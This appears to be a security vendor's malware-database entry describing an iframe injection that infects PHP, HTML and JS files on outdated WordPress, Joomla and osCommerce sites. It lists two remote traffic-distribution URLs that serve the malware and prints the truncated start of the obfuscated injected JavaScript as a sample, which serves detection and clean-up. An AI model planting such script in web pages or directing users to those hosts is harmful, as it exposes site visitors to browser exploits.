Description:
A hidden and dangerous iframe was identified. It loads content from remote web sites in attempt to exploit a specific browser vulnerability. In some variations, the browser is redirected to blackhat seo spam sites. It is also known as "Exploit:HTML/IframeRef.AA" by some anti virus products.
Note that every PHP, HTML and JS file gets compromised by this malware.
Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.
Clean up: You can also sign up with us and let our team remove the malware for you.
Loads malware from multiple sources:
http://tds83.1dumb.com/stds/go.php?sid=1
http://pokosa.com/tds/go.php?sid=1
(and many other domains).
Malware dump (sample of malware):
<script>var v25c9d="";var lf742f9a8
b867d8={xdd82ce9ebc:function(sa)
{var u1=String,w6=sa.substr(4,3)-675,x7,t2;sa=sa.substr(7);var te=sa.length;for(var u4=0;u4<te;u4++)
{try{throw(s4=sa.substr(u4,1));}catch(e){s4=e;};if(s4=='|')
{w6="";u4++;t9=sa.substr(u4,1);while(t9!='|'){w6+=t9;u4++;t9=sa.substr(u4,1);}w6-
=683;continue;}x7="";if(s4=='�')
{u4++;s4=sa.substr(u4,1);while(s4!='�'){